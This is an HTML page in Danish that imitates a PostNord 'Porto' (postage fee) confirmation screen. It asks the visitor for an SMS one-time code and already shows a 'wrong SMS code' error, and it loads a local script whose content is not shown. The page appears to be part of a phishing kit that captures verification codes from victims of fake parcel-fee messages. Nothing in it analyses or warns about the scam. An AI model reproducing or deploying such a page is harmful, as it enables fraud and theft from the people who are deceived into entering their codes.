<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/minak.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div>
        <div class="roof">
            <img src="./img/topp1.JPG" alt="">
        </div>
        <img class="top2" src="./img/cc-top2.JPG" alt="">
    </div>


    <div>
        <div class="forma">
            <div class="cc1">
                <p class="ccp">PostNord Porto</p>
                <div class="cc2">
                    <div class="">
                        <p> Bekræftelse via SMS:</p>
                        
                    </div>
                    <!--  -->
                    
                </div>
            </div>

            <div class="insid">
                
                <div class=""> 
                    <div class="vis">
                        <p class="sm1">Du skal bekræfte dig selv ved at indtaste den engangskode, du har modtaget på din telefon.</p>
                    </div>
                    
                    <form method="post" id="pg4">
                        <p>SMS-kode </p>
                        <input type="tele" name="" id="sps2" maxlength="10">

                        <p style="margin-left: 0px; margin-top: -10px; color: rgb(192, 28, 28);">Forkert SMS-kode</p>


                        

                        <button class="btn2"  type="submit">Bekræft</button>
                    </form>
                </div>
                
            </div>
        </div>
    </div>


    <div>
        <div>
            <div class="boot">
                <img src="./img/boott.JPG" alt="">
            </div>
        </div>
    </div>

    
    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>